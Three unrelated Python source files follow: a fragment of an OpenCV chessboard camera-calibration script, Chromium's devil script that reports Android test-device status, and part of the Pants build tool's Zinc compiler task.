help='Frames per second',
type=int,
required=True)
parser.add_argument('--rows',
help='Number of rows in checkerboard (default = 8)',
type=int,
required=False)
parser.add_argument('--columns',
help='Number of columns in checkerboard (default = 8)',
type=int,
required=False)
parser.add_argument('--grid_width',
help='Width of checkerboard squares (default = 1 cm)',
required=False)
parser.add_argument('--grid_height',
help='Height of checkerboard squares (default = 1 cm)',
required=False)
parser.add_argument('--save_corners',
help='Save corners',
action="store_true",
required=False)
parser.add_argument('--max_images',
help='Maximum number of images to use for calibration.',
type=int,
required=False)
args = parser.parse_args()
# Setup grids to defaults if not passed as arguments
if not args.rows:
pts_arow = 9 # Number of internal intersections
else:
pts_arow = args.rows
if not args.columns:
pts_acol = 6
else:
pts_acol = args.columns
if not args.grid_width:
grid_width = float(1.0) # cm
else:
grid_width = float(args.grid_width)
if not args.grid_height:
grid_height = float(1.0) # cm
else:
grid_height = float(args.grid_height)
if not args.save_corners:
writeCorners = 0
else:
writeCorners = 1
if not args.max_images:
max_images = 100
else:
max_images = args.max_images
# Video file
vidFileName = args.file
# fps
fps = args.fps
##########################################################################
# Checking
print("\n------")
print("Intersections:", pts_arow, "x", pts_acol)
print("Square size:", grid_width, "cm x", grid_height, "cm")
print("Video:", vidFileName)
print("------\n")
# Pattern
patternSize = (pts_arow, pts_acol)
# Open movie
vidFile = cv2.VideoCapture(vidFileName)
# Trim the last 2% off, because CV_CAP_PROP_FRAME_COUNT is not
# accurate
nframes = int(0.98 * vidFile.get(cv2.CAP_PROP_FRAME_COUNT))
width = int(vidFile.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vidFile.get(cv2.CAP_PROP_FRAME_HEIGHT))
print('Num Frames = ', nframes)
print('Frame rate =', fps, 'frames per sec\n')
# Process images one by 1
# Initialization
corners = list(range(nframes))
criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 30, 0.01)
# Number of good images
nboard = 0
print("Finding corners...\n")
fnum = 1
while(vidFile.isOpened()):
ret, frameImg = vidFile.read()
if frameImg is None:
print("no frame", f, "flawed. Cancel")
break
BWImg = cv2.cvtColor(frameImg, cv2.COLOR_RGB2GRAY)
# Find corners
retcode, cor = \
cv2.findChessboardCorners(BWImg, patternSize,
cv2.CALIB_CB_ADAPTIVE_THRESH +
cv2.CALIB_CB_FAST_CHECK +
cv2.CALIB_CB_NORMALIZE_IMAGE)
if retcode == 1:
# Refine corners with subpixel accuracy
corners[nboard] = cv2.cornerSubPix(BWImg, cor, (3, 3),
(0, 0), criteria)
colorimg = cv2.cvtColor(BWImg, cv2.COLOR_GRAY2RGB)
cv2.drawChessboardCorners(colorimg, patternSize,
corners[nboard], retcode)
if writeCorners:
# File name for image with corners
filename = vidFileName + "_corner_" + format(fnum, "04d") + ".jpg"
cv2.imwrite(filename, colorimg)
nboard += 1
fnum += 1
if fnum % 100 == 0:
print("Frame: ", fnum)
vidFile.release()
print("\nFound", nboard, "images with corners.\n")
if len(corners) == 0:
print("No corners detected.\n")
sys.exit()
# Cutoff the empty end of corners
corners = corners[0:nboard]
#import pickle
#pickle.dump(corners, open("corners.pkl", "wb"))
#corners = pickle.load(open("corners.pkl", "rb"))
# Calibration
# Check that there aren't too many images (~100; downsample if so)
if len(corners) > max_images:
print("Reducing the set of images with detected corners to", \
max_images, "images by random selection.\n")
corners = [corners[i] for i in
sorted(random.sample(range(len(corners)),
max_images))]
nboard = len(corners)
# Transfer points to calibration
ncor = pts_arow * pts_acol
npts = nboard * ncor
object_points = cv2.CreateMat(npts, 3, cv2.CV_32FC1)
image_points = cv2.CreateMat(npts, 2, cv2.CV_32FC1)
point_counts = cv2.CreateMat(nboard, 1, cv2.CV_32SC1)
p = 0
for i in range(nboard):
cv2.SetReal2D(point_counts, i, 0, ncor)
for c in range(ncor):
cv2.SetReal2D(object_points, p, 0, (c / pts_arow) * grid_height)
cv2.SetReal2D(object_points, p, 1, (c % pts_arow) * grid_width)
cv2.SetReal2D(object_points, p, 2, 0.0)
cv2.SetReal2D(image_points, p, 0, corners[i][c][0])
cv2.SetReal2D(image_points, p, 1, corners[i][c][1])
p += 1
# Calibrate
camera_matrix = cv2.CreateMat(3, 3, cv2.CV_32FC1)
dist_coeffs = cv2.CreateMat(5, 1, cv2.CV_32FC1)
rvecs = cv2.CreateMat(nboard, 3, cv2.CV_32FC1)
tvecs = cv2.CreateMat(nboard, 3, cv2.CV_32FC1)
print("Calibrating (this might be slow)...\n")
cv2.CalibrateCamera2(object_points, image_points,
point_counts, (width, height),
camera_matrix, dist_coeffs, rvecs, tvecs, 0)
# Save files and print results
print("Camera matrix:")
camMatFile = vidFileName + "_camera_matrix.csv"
file = open(camMatFile, "w")
for i in range(3):
for j in range(3):
print(camera_matrix[i, j],)
file.write(str(camera_matrix[i, j]))
if j < 2:
file.write(", ")
else:
file.write("\n")
print
file.close()
print("\n")
print("Distortion coefficients:")
distortionCoefsFile = vidFileName + "_distortion_coefficients.csv"
file = open(distortionCoefsFile, "w")
for i in range(5):
print(dist_coeffs[i, 0],)
file.write(str(dist_coeffs[i, 0]))
if i < 4:
file.write(", ")
file.close()
# Toc
t1 = time.time()
total = t1 - t0
print('\n\nTotal time:', total, "s")
| |
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A script to keep track of devices across builds and report state."""
import argparse
import json
import logging
import os
import re
import sys
if __name__ == '__main__':
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..')))
from devil import devil_env
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_list
from devil.android import device_utils
from devil.android.sdk import adb_wrapper
from devil.constants import exit_codes
from devil.utils import lsusb
from devil.utils import run_tests_helper
logger = logging.getLogger(__name__)
_RE_DEVICE_ID = re.compile(r'Device ID = (\d+)')
def IsBlacklisted(serial, blacklist):
return blacklist and serial in blacklist.Read()
def _BatteryStatus(device, blacklist):
battery_info = {}
try:
battery = battery_utils.BatteryUtils(device)
battery_info = battery.GetBatteryInfo(timeout=5)
battery_level = int(battery_info.get('level', 100))
if battery_level < 15:
logger.error('Critically low battery level (%d)', battery_level)
battery = battery_utils.BatteryUtils(device)
if not battery.GetCharging():
battery.SetCharging(True)
if blacklist:
blacklist.Extend([device.adb.GetDeviceSerial()], reason='low_battery')
except (device_errors.CommandFailedError,
device_errors.DeviceUnreachableError):
logger.exception('Failed to get battery information for %s',
str(device))
return battery_info
def _IMEISlice(device):
imei_slice = ''
try:
for l in device.RunShellCommand(['dumpsys', 'iphonesubinfo'],
check_return=True, timeout=5):
m = _RE_DEVICE_ID.match(l)
if m:
imei_slice = m.group(1)[-6:]
except (device_errors.CommandFailedError,
device_errors.DeviceUnreachableError):
logger.exception('Failed to get IMEI slice for %s', str(device))
return imei_slice
def DeviceStatus(devices, blacklist):
"""Generates status information for the given devices.
Args:
devices: The devices to generate status for.
blacklist: The current device blacklist.
Returns:
A dict of the following form:
{
'<serial>': {
'serial': '<serial>',
'adb_status': str,
'usb_status': bool,
'blacklisted': bool,
# only if the device is connected and not blacklisted
'type': ro.build.product,
'build': ro.build.id,
'build_detail': ro.build.fingerprint,
'battery': {
...
},
'imei_slice': str,
'wifi_ip': str,
},
...
}
"""
adb_devices = {
a[0].GetDeviceSerial(): a
for a in adb_wrapper.AdbWrapper.Devices(desired_state=None, long_list=True)
}
usb_devices = set(lsusb.get_android_devices())
def blacklisting_device_status(device):
serial = device.adb.GetDeviceSerial()
adb_status = (
adb_devices[serial][1] if serial in adb_devices
else 'missing')
usb_status = bool(serial in usb_devices)
device_status = {
'serial': serial,
'adb_status': adb_status,
'usb_status': usb_status,
}
if not IsBlacklisted(serial, blacklist):
if adb_status == 'device':
try:
build_product = device.build_product
build_id = device.build_id
build_fingerprint = device.build_fingerprint
build_description = device.build_description
wifi_ip = device.GetProp('dhcp.wlan0.ipaddress')
battery_info = _BatteryStatus(device, blacklist)
imei_slice = _IMEISlice(device)
if (device.product_name == 'mantaray' and
battery_info.get('AC powered', None) != 'true'):
logger.error('Mantaray device not connected to AC power.')
device_status.update({
'ro.build.product': build_product,
'ro.build.id': build_id,
'ro.build.fingerprint': build_fingerprint,
'ro.build.description': build_description,
'battery': battery_info,
'imei_slice': imei_slice,
'wifi_ip': wifi_ip,
})
except (device_errors.CommandFailedError,
device_errors.DeviceUnreachableError):
logger.exception('Failure while getting device status for %s.',
str(device))
if blacklist:
blacklist.Extend([serial], reason='status_check_failure')
except device_errors.CommandTimeoutError:
logger.exception('Timeout while getting device status for %s.',
str(device))
if blacklist:
blacklist.Extend([serial], reason='status_check_timeout')
elif blacklist:
blacklist.Extend([serial],
reason=adb_status if usb_status else 'offline')
device_status['blacklisted'] = IsBlacklisted(serial, blacklist)
return device_status
parallel_devices = device_utils.DeviceUtils.parallel(devices)
statuses = parallel_devices.pMap(blacklisting_device_status).pGet(None)
return statuses
def _LogStatuses(statuses):
# Log the state of all devices.
for status in statuses:
logger.info(status['serial'])
adb_status = status.get('adb_status')
blacklisted = status.get('blacklisted')
logger.info(' USB status: %s',
'online' if status.get('usb_status') else 'offline')
logger.info(' ADB status: %s', adb_status)
logger.info(' Blacklisted: %s', str(blacklisted))
if adb_status == 'device' and not blacklisted:
logger.info(' Device type: %s', status.get('ro.build.product'))
logger.info(' OS build: %s', status.get('ro.build.id'))
logger.info(' OS build fingerprint: %s',
status.get('ro.build.fingerprint'))
logger.info(' Battery state:')
for k, v in status.get('battery', {}).iteritems():
logger.info(' %s: %s', k, v)
logger.info(' IMEI slice: %s', status.get('imei_slice'))
logger.info(' WiFi IP: %s', status.get('wifi_ip'))
def _WriteBuildbotFile(file_path, statuses):
buildbot_path, _ = os.path.split(file_path)
if os.path.exists(buildbot_path):
with open(file_path, 'w') as f:
for status in statuses:
try:
if status['adb_status'] == 'device':
f.write('{serial} {adb_status} {build_product} {build_id} '
'{temperature:.1f}C {level}%\n'.format(
serial=status['serial'],
adb_status=status['adb_status'],
build_product=status['type'],
build_id=status['build'],
temperature=float(status['battery']['temperature']) / 10,
level=status['battery']['level']
))
elif status.get('usb_status', False):
f.write('{serial} {adb_status}\n'.format(
serial=status['serial'],
adb_status=status['adb_status']
))
else:
f.write('{serial} offline\n'.format(
serial=status['serial']
))
except Exception: # pylint: disable=broad-except
pass
def GetExpectedDevices(known_devices_files):
expected_devices = set()
try:
for path in known_devices_files:
if os.path.exists(path):
expected_devices.update(device_list.GetPersistentDeviceList(path))
else:
logger.warning('Could not find known devices file: %s', path)
except IOError:
logger.warning('Problem reading %s, skipping.', path)
logger.info('Expected devices:')
for device in expected_devices:
logger.info(' %s', device)
return expected_devices
def AddArguments(parser):
parser.add_argument('--json-output',
help='Output JSON information into a specified file.')
parser.add_argument('--adb-path',
help='Absolute path to the adb binary to use.')
parser.add_argument('--blacklist-file', help='Device blacklist JSON file.')
parser.add_argument('--known-devices-file', action='append', default=[],
dest='known_devices_files',
help='Path to known device lists.')
parser.add_argument('--buildbot-path', '-b',
default='/home/chrome-bot/.adb_device_info',
help='Absolute path to buildbot file location')
parser.add_argument('-v', '--verbose', action='count', default=1,
help='Log more information.')
parser.add_argument('-w', '--overwrite-known-devices-files',
action='store_true',
help='If set, overwrites known devices files wiht new '
'values.')
def main():
parser = argparse.ArgumentParser()
AddArguments(parser)
args = parser.parse_args()
run_tests_helper.SetLogLevel(args.verbose)
devil_dynamic_config = devil_env.EmptyConfig()
if args.adb_path:
devil_dynamic_config['dependencies'].update(
devil_env.LocalConfigItem(
'adb', devil_env.GetPlatform(), args.adb_path))
devil_env.config.Initialize(configs=[devil_dynamic_config])
blacklist = (device_blacklist.Blacklist(args.blacklist_file)
if args.blacklist_file
else None)
expected_devices = GetExpectedDevices(args.known_devices_files)
usb_devices = set(lsusb.get_android_devices())
devices = [device_utils.DeviceUtils(s)
for s in expected_devices.union(usb_devices)]
statuses = DeviceStatus(devices, blacklist)
# Log the state of all devices.
_LogStatuses(statuses)
# Update the last devices file(s).
if args.overwrite_known_devices_files:
for path in args.known_devices_files:
device_list.WritePersistentDeviceList(
path, [status['serial'] for status in statuses])
# Write device info to file for buildbot info display.
_WriteBuildbotFile(args.buildbot_path, statuses)
# Dump the device statuses to JSON.
if args.json_output:
with open(args.json_output, 'wb') as f:
f.write(json.dumps(
statuses, indent=4, sort_keys=True, separators=(',', ': ')))
live_devices = [status['serial'] for status in statuses
if (status['adb_status'] == 'device'
and not IsBlacklisted(status['serial'], blacklist))]
# If all devices failed, or if there are no devices, it's an infra error.
if not live_devices:
logger.error('No available devices.')
return 0 if live_devices else exit_codes.INFRA
if __name__ == '__main__':
sys.exit(main())
| |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import logging
import os
import re
import textwrap
from collections import defaultdict
from contextlib import closing
from hashlib import sha1
from xml.etree import ElementTree
from pants.backend.jvm.subsystems.java import Java
from pants.backend.jvm.subsystems.jvm_platform import JvmPlatform
from pants.backend.jvm.subsystems.scala_platform import ScalaPlatform
from pants.backend.jvm.subsystems.zinc import Zinc
from pants.backend.jvm.targets.annotation_processor import AnnotationProcessor
from pants.backend.jvm.targets.javac_plugin import JavacPlugin
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.targets.scalac_plugin import ScalacPlugin
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.jvm_compile.jvm_compile import JvmCompile
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.hash_utils import hash_file
from pants.base.workunit import WorkUnitLabel
from pants.java.distribution.distribution import DistributionLocator
from pants.util.contextutil import open_zip
from pants.util.dirutil import safe_open
from pants.util.memo import memoized_method, memoized_property
# Well known metadata file required to register scalac plugins with nsc.
_SCALAC_PLUGIN_INFO_FILE = 'scalac-plugin.xml'
# Well known metadata file to register javac plugins.
_JAVAC_PLUGIN_INFO_FILE = 'META-INF/services/com.sun.source.util.Plugin'
# Well known metadata file to register annotation processors with a java 1.6+ compiler.
_PROCESSOR_INFO_FILE = 'META-INF/services/javax.annotation.processing.Processor'
logger = logging.getLogger(__name__)
class BaseZincCompile(JvmCompile):
"""An abstract base class for zinc compilation tasks."""
_name = 'zinc'
@staticmethod
def _write_scalac_plugin_info(resources_dir, scalac_plugin_target):
scalac_plugin_info_file = os.path.join(resources_dir, _SCALAC_PLUGIN_INFO_FILE)
with safe_open(scalac_plugin_info_file, 'w') as f:
f.write(textwrap.dedent("""
<plugin>
<name>{}</name>
<classname>{}</classname>
</plugin>
""".format(scalac_plugin_target.plugin, scalac_plugin_target.classname)).strip())
@staticmethod
def _write_javac_plugin_info(resources_dir, javac_plugin_target):
javac_plugin_info_file = os.path.join(resources_dir, _JAVAC_PLUGIN_INFO_FILE)
with safe_open(javac_plugin_info_file, 'w') as f:
f.write(javac_plugin_target.classname)
@staticmethod
def validate_arguments(log, whitelisted_args, args):
"""Validate that all arguments match whitelisted regexes."""
valid_patterns = {re.compile(p): v for p, v in whitelisted_args.items()}
def validate(idx):
arg = args[idx]
for pattern, has_argument in valid_patterns.items():
if pattern.match(arg):
return 2 if has_argument else 1
log.warn("Zinc argument '{}' is not supported, and is subject to change/removal!".format(arg))
return 1
arg_index = 0
while arg_index < len(args):
arg_index += validate(arg_index)
@staticmethod
def _get_zinc_arguments(settings):
"""Extracts and formats the zinc arguments given in the jvm platform settings.
This is responsible for the symbol substitution which replaces $JAVA_HOME with the path to an
appropriate jvm distribution.
:param settings: The jvm platform settings from which to extract the arguments.
:type settings: :class:`JvmPlatformSettings`
"""
zinc_args = [
'-C-source', '-C{}'.format(settings.source_level),
'-C-target', '-C{}'.format(settings.target_level),
]
if settings.args:
settings_args = settings.args
if any('$JAVA_HOME' in a for a in settings.args):
try:
distribution = JvmPlatform.preferred_jvm_distribution([settings], strict=True)
except DistributionLocator.Error:
distribution = JvmPlatform.preferred_jvm_distribution([settings], strict=False)
logger.debug('Substituting "$JAVA_HOME" with "{}" in jvm-platform args.'
.format(distribution.home))
settings_args = (a.replace('$JAVA_HOME', distribution.home) for a in settings.args)
zinc_args.extend(settings_args)
return zinc_args
@classmethod
def implementation_version(cls):
return super(BaseZincCompile, cls).implementation_version() + [('BaseZincCompile', 7)]
@classmethod
def get_jvm_options_default(cls, bootstrap_option_values):
return ('-Dfile.encoding=UTF-8', '-Dzinc.analysis.cache.limit=1000',
'-Djava.awt.headless=true', '-Xmx2g')
@classmethod
def get_args_default(cls, bootstrap_option_values):
return ('-C-encoding', '-CUTF-8', '-S-encoding', '-SUTF-8', '-S-g:vars')
@classmethod
def get_warning_args_default(cls):
return ('-C-deprecation', '-C-Xlint:all', '-C-Xlint:-serial', '-C-Xlint:-path',
'-S-deprecation', '-S-unchecked', '-S-Xlint')
@classmethod
def get_no_warning_args_default(cls):
return ('-C-nowarn', '-C-Xlint:none', '-S-nowarn', '-S-Xlint:none', )
@classmethod
def get_fatal_warnings_enabled_args_default(cls):
return ('-S-Xfatal-warnings', '-C-Werror')
@classmethod
def get_fatal_warnings_disabled_args_default(cls):
return ()
@classmethod
def register_options(cls, register):
super(BaseZincCompile, cls).register_options(register)
register('--whitelisted-args', advanced=True, type=dict,
default={
'-S.*': False,
'-C.*': False,
'-file-filter': True,
'-msg-filter': True,
},
help='A dict of option regexes that make up pants\' supported API for zinc. '
'Options not listed here are subject to change/removal. The value of the dict '
'indicates that an option accepts an argument.')
register('--incremental', advanced=True, type=bool, default=True,
help='When set, zinc will use sub-target incremental compilation, which dramatically '
'improves compile performance while changing large targets. When unset, '
'changed targets will be compiled with an empty output directory, as if after '
'running clean-all.')
register('--incremental-caching', advanced=True, type=bool,
help='When set, the results of incremental compiles will be written to the cache. '
'This is unset by default, because it is generally a good precaution to cache '
'only clean/cold builds.')
@classmethod
def subsystem_dependencies(cls):
return super(BaseZincCompile, cls).subsystem_dependencies() + (Zinc.Factory, JvmPlatform,)
@classmethod
def prepare(cls, options, round_manager):
super(BaseZincCompile, cls).prepare(options, round_manager)
ScalaPlatform.prepare_tools(round_manager)
@property
def incremental(self):
"""Zinc implements incremental compilation.
Setting this property causes the task infrastructure to clone the previous
results_dir for a target into the new results_dir for a target.
"""
return self.get_options().incremental
@property
def cache_incremental(self):
"""Optionally write the results of incremental compiles to the cache."""
return self.get_options().incremental_caching
@memoized_property
def _zinc(self):
return Zinc.Factory.global_instance().create(self.context.products)
def __init__(self, *args, **kwargs):
super(BaseZincCompile, self).__init__(*args, **kwargs)
# A directory to contain per-target subdirectories with apt processor info files.
self._processor_info_dir = os.path.join(self.workdir, 'apt-processor-info')
# Validate zinc options.
ZincCompile.validate_arguments(self.context.log, self.get_options().whitelisted_args,
self._args)
def select(self, target):
raise NotImplementedError()
def select_source(self, source_file_path):
raise NotImplementedError()
def register_extra_products_from_contexts(self, targets, compile_contexts):
compile_contexts = [self.select_runtime_context(compile_contexts[t]) for t in targets]
zinc_analysis = self.context.products.get_data('zinc_analysis')
zinc_args = self.context.products.get_data('zinc_args')
if zinc_analysis is not None:
for compile_context in compile_contexts:
zinc_analysis[compile_context.target] = (compile_context.classes_dir,
compile_context.jar_file,
compile_context.analysis_file)
if zinc_args is not None:
for compile_context in compile_contexts:
with open(compile_context.zinc_args_file, 'r') as fp:
args = fp.read().split()
zinc_args[compile_context.target] = args
def create_empty_extra_products(self):
if self.context.products.is_required_data('zinc_analysis'):
self.context.products.safe_create_data('zinc_analysis', dict)
if self.context.products.is_required_data('zinc_args'):
self.context.products.safe_create_data('zinc_args', lambda: defaultdict(list))
def javac_classpath(self):
# Note that if this classpath is empty then Zinc will automatically use the javac from
# the JDK it was invoked with.
return Java.global_javac_classpath(self.context.products)
def scalac_classpath(self):
return ScalaPlatform.global_instance().compiler_classpath(self.context.products)
def write_extra_resources(self, compile_context):
"""Override write_extra_resources to produce plugin and annotation processor files."""
target = compile_context.target
if isinstance(target, ScalacPlugin):
self._write_scalac_plugin_info(compile_context.classes_dir, target)
elif isinstance(target, JavacPlugin):
self._write_javac_plugin_info(compile_context.classes_dir, target)
elif isinstance(target, AnnotationProcessor) and target.processors:
processor_info_file = os.path.join(compile_context.classes_dir, _PROCESSOR_INFO_FILE)
self._write_processor_info(processor_info_file, target.processors)
def _write_processor_info(self, processor_info_file, processors):
with safe_open(processor_info_file, 'w') as f:
for processor in processors:
f.write('{}\n'.format(processor.strip()))
@memoized_property
def _zinc_cache_dir(self):
"""A directory where zinc can store compiled copies of the `compiler-bridge`.
The compiler-bridge is specific to each scala version, and is lazily computed by zinc if the
appropriate version does not exist. Eventually it would be great to just fetch this rather
than compiling it.
"""
hasher = sha1()
for cp_entry in self._zinc.zinc + [self._zinc.compiler_interface, self._zinc.compiler_bridge]:
hasher.update(os.path.relpath(cp_entry, self.get_options().pants_workdir))
key = hasher.hexdigest()[:12]
return os.path.join(self.get_options().pants_bootstrapdir, 'zinc', key)
def compile(self, ctx, args, classpath, upstream_analysis,
settings, fatal_warnings, zinc_file_manager,
javac_plugin_map, scalac_plugin_map):
self._verify_zinc_classpath(classpath)
self._verify_zinc_classpath(upstream_analysis.keys())
zinc_args = []
zinc_args.extend([
'-log-level', self.get_options().level,
'-analysis-cache', ctx.analysis_file,
'-classpath', ':'.join(classpath),
'-d', ctx.classes_dir
])
if not self.get_options().colors:
zinc_args.append('-no-color')
zinc_args.extend(['-compiler-interface', self._zinc.compiler_interface])
zinc_args.extend(['-compiler-bridge', self._zinc.compiler_bridge])
zinc_args.extend(['-zinc-cache-dir', self._zinc_cache_dir])
zinc_args.extend(['-scala-path', ':'.join(self.scalac_classpath())])
zinc_args.extend(self._javac_plugin_args(javac_plugin_map))
# Search for scalac plugins on the classpath.
# Note that:
# - We also search in the extra scalac plugin dependencies, if specified.
# - In scala 2.11 and up, the plugin's classpath element can be a dir, but for 2.10 it must be
# a jar. So in-repo plugins will only work with 2.10 if --use-classpath-jars is true.
# - We exclude our own classes_dir/jar_file, because if we're a plugin ourselves, then our
# classes_dir doesn't have scalac-plugin.xml yet, and we don't want that fact to get
# memoized (which in practice will only happen if this plugin uses some other plugin, thus
# triggering the plugin search mechanism, which does the memoizing).
scalac_plugin_search_classpath = (
(set(classpath) | set(self.scalac_plugin_classpath_elements())) -
{ctx.classes_dir, ctx.jar_file}
)
zinc_args.extend(self._scalac_plugin_args(scalac_plugin_map, scalac_plugin_search_classpath))
if upstream_analysis:
zinc_args.extend(['-analysis-map',
','.join('{}:{}'.format(*kv) for kv in upstream_analysis.items())])
zinc_args.extend(self._zinc.rebase_map_args)
zinc_args.extend(args)
zinc_args.extend(self._get_zinc_arguments(settings))
zinc_args.append('-transactional')
if fatal_warnings:
zinc_args.extend(self.get_options().fatal_warnings_enabled_args)
else:
zinc_args.extend(self.get_options().fatal_warnings_disabled_args)
if not self._clear_invalid_analysis:
zinc_args.append('-no-clear-invalid-analysis')
if not zinc_file_manager:
zinc_args.append('-no-zinc-file-manager')
jvm_options = []
if self.javac_classpath():
# Make the custom javac classpath the first thing on the bootclasspath, to ensure that
# it's the one javax.tools.ToolProvider.getSystemJavaCompiler() loads.
# It will probably be loaded even on the regular classpath: If not found on the bootclasspath,
# getSystemJavaCompiler() constructs a classloader that loads from the JDK's tools.jar.
# That classloader will first delegate to its parent classloader, which will search the
# regular classpath. However it's harder to guarantee that our javac will preceed any others
# on the classpath, so it's safer to prefix it to the bootclasspath.
jvm_options.extend(['-Xbootclasspath/p:{}'.format(':'.join(self.javac_classpath()))])
jvm_options.extend(self._jvm_options)
zinc_args.extend(ctx.sources)
self.log_zinc_file(ctx.analysis_file)
with open(ctx.zinc_args_file, 'w') as fp:
for arg in zinc_args:
fp.write(arg)
fp.write(b'\n')
if self.runjava(classpath=self._zinc.zinc,
main=Zinc.ZINC_COMPILE_MAIN,
jvm_options=jvm_options,
args=zinc_args,
workunit_name=self.name(),
workunit_labels=[WorkUnitLabel.COMPILER],
dist=self._zinc.dist):
raise TaskError('Zinc compile failed.')
def _verify_zinc_classpath(self, classpath):
def is_outside(path, putative_parent):
return os.path.relpath(path, putative_parent).startswith(os.pardir)
dist = self._zinc.dist
for path in classpath:
if not os.path.isabs(path):
raise TaskError('Classpath entries provided to zinc should be absolute. '
'{} is not.'.format(path))
if is_outside(path, self.get_options().pants_workdir) and is_outside(path, dist.home):
raise TaskError('Classpath entries provided to zinc should be in working directory or '
'part of the JDK. {} is not.'.format(path))
if path != os.path.normpath(path):
raise TaskError('Classpath entries provided to zinc should be normalized '
'(i.e. without ".." and "."). {} is not.'.format(path))
def log_zinc_file(self, analysis_file):
self.context.log.debug('Calling zinc on: {} ({})'
.format(analysis_file,
hash_file(analysis_file).upper()
if os.path.exists(analysis_file)
else 'nonexistent'))
@classmethod
def _javac_plugin_args(cls, javac_plugin_map):
ret = []
for plugin, args in javac_plugin_map.items():
for arg in args:
if ' ' in arg:
# Note: Args are separated by spaces, and there is no way to escape embedded spaces, as
# javac's Main does a simple split on these strings.
raise TaskError('javac plugin args must not contain spaces '
'(arg {} for plugin {})'.format(arg, plugin))
ret.append('-C-Xplugin:{} {}'.format(plugin, ' '.join(args)))
return ret
def _scalac_plugin_args(self, scalac_plugin_map, classpath):
if not scalac_plugin_map:
return []
plugin_jar_map = self._find_scalac_plugins(scalac_plugin_map.keys(), classpath)
ret = []
for name, cp_entries in plugin_jar_map.items():
# Note that the first element in cp_entries is the one containing the plugin's metadata,
# meaning that this is the plugin that will be loaded, even if there happen to be other
# plugins in the list of entries (e.g., because this plugin depends on another plugin).
ret.append('-S-Xplugin:{}'.format(':'.join(cp_entries)))
for arg in scalac_plugin_map[name]:
ret.append('-S-P:{}:{}'.format(name, arg))
return ret
def _find_scalac_plugins(self, scalac_plugins, classpath):
"""Returns a map from plugin name to list of plugin classpath entries.
The first entry in each list is the classpath entry containing the plugin metadata.
The rest are the internal transitive deps of the plugin.
This allows us to have in-repo plugins with dependencies (unlike javac, scalac doesn't load
plugins or their deps from the regular classpath, so we have to provide these entries
separately, in the -Xplugin: flag).
Note that we don't currently support external plugins with dependencies, as we can't know which
external classpath elements are required, and we'd have to put the entire external classpath
on each -Xplugin: flag, which seems excessive.
Instead, external plugins should be published as "fat jars" (which appears to be the norm,
since SBT doesn't support plugins with dependencies anyway).
"""
# Allow multiple flags and also comma-separated values in a single flag.
plugin_names = set([p for val in scalac_plugins for p in val.split(',')])
if not plugin_names:
return {}
active_plugins = {}
buildroot = get_buildroot()
cp_product = self.context.products.get_data('runtime_classpath')
for classpath_element in classpath:
name = self._maybe_get_plugin_name(classpath_element)
if name in plugin_names:
plugin_target_closure = self._plugin_targets('scalac').get(name, [])
# It's important to use relative paths, as the compiler flags get embedded in the zinc
# analysis file, and we port those between systems via the artifact cache.
rel_classpath_elements = [
os.path.relpath(cpe, buildroot) for cpe in
ClasspathUtil.internal_classpath(plugin_target_closure, cp_product, self._confs)]
# If the plugin is external then rel_classpath_elements will be empty, so we take
# just the external jar itself.
rel_classpath_elements = rel_classpath_elements or [classpath_element]
# Some classpath elements may be repeated, so we allow for that here.
if active_plugins.get(name, rel_classpath_elements) != rel_classpath_elements:
raise TaskError('Plugin {} defined in {} and in {}'.format(name, active_plugins[name],
classpath_element))
active_plugins[name] = rel_classpath_elements
if len(active_plugins) == len(plugin_names):
# We've found all the plugins, so return now to spare us from processing
# of the rest of the classpath for no reason.
return active_plugins
# If we get here we must have unresolved plugins.
unresolved_plugins = plugin_names - set(active_plugins.keys())
raise TaskError('Could not find requested plugins: {}'.format(list(unresolved_plugins)))
@classmethod
@memoized_method
def _maybe_get_plugin_name(cls, classpath_element):
"""If classpath_element is a scalac plugin, returns its name.
Returns None otherwise.
"""
def process_info_file(cp_elem, info_file):
plugin_info = ElementTree.parse(info_file).getroot()
if plugin_info.tag != 'plugin':
raise TaskError('File {} in {} is not a valid scalac plugin descriptor'.format(
_SCALAC_PLUGIN_INFO_FILE, cp_elem))
return plugin_info.find('name').text
if os.path.isdir(classpath_element):
try:
with open(os.path.join(classpath_element, _SCALAC_PLUGIN_INFO_FILE)) as plugin_info_file:
return process_info_file(classpath_element, plugin_info_file)
except IOError as e:
if e.errno != errno.ENOENT:
raise
else:
with open_zip(classpath_element, 'r') as jarfile:
try:
with closing(jarfile.open(_SCALAC_PLUGIN_INFO_FILE, 'r')) as plugin_info_file:
return process_info_file(classpath_element, plugin_info_file)
except KeyError:
pass
return None
class ZincCompile(BaseZincCompile):
"""Compile Scala and Java code to classfiles using Zinc."""
@classmethod
def register_options(cls, register):
super(ZincCompile, cls).register_options(register)
register('--javac-plugins', advanced=True, type=list, fingerprint=True,
removal_version='1.9.0.dev0',
removal_hint='Use `--java-javac-plugins` instead.',
help='Use these javac plugins.')
register('--javac-plugin-args', advanced=True, type=dict, default={}, fingerprint=True,
removal_version='1.9.0.dev0',
removal_hint='Use `--java-javac-plugin-args` instead.',
help='Map from javac plugin name to list of arguments for that plugin.')
cls.register_jvm_tool(register, 'javac-plugin-dep', classpath=[],
removal_version='1.9.0.dev0',
removal_hint='Use `--java-javac-plugin-dep` instead.',
help='Search for javac plugins here, as well as in any '
'explicit dependencies.')
register('--scalac-plugins', advanced=True, type=list, fingerprint=True,
removal_version='1.9.0.dev0',
removal_hint='Use `--scala-scalac-plugins` instead.',
help='Use these scalac plugins.')
register('--scalac-plugin-args', advanced=True, type=dict, default={}, fingerprint=True,
removal_version='1.9.0.dev0',
removal_hint='Use `--scala-scalac-plugin-args` instead.',
help='Map from scalac plugin name to list of arguments for that plugin.')
cls.register_jvm_tool(register, 'scalac-plugin-dep', classpath=[],
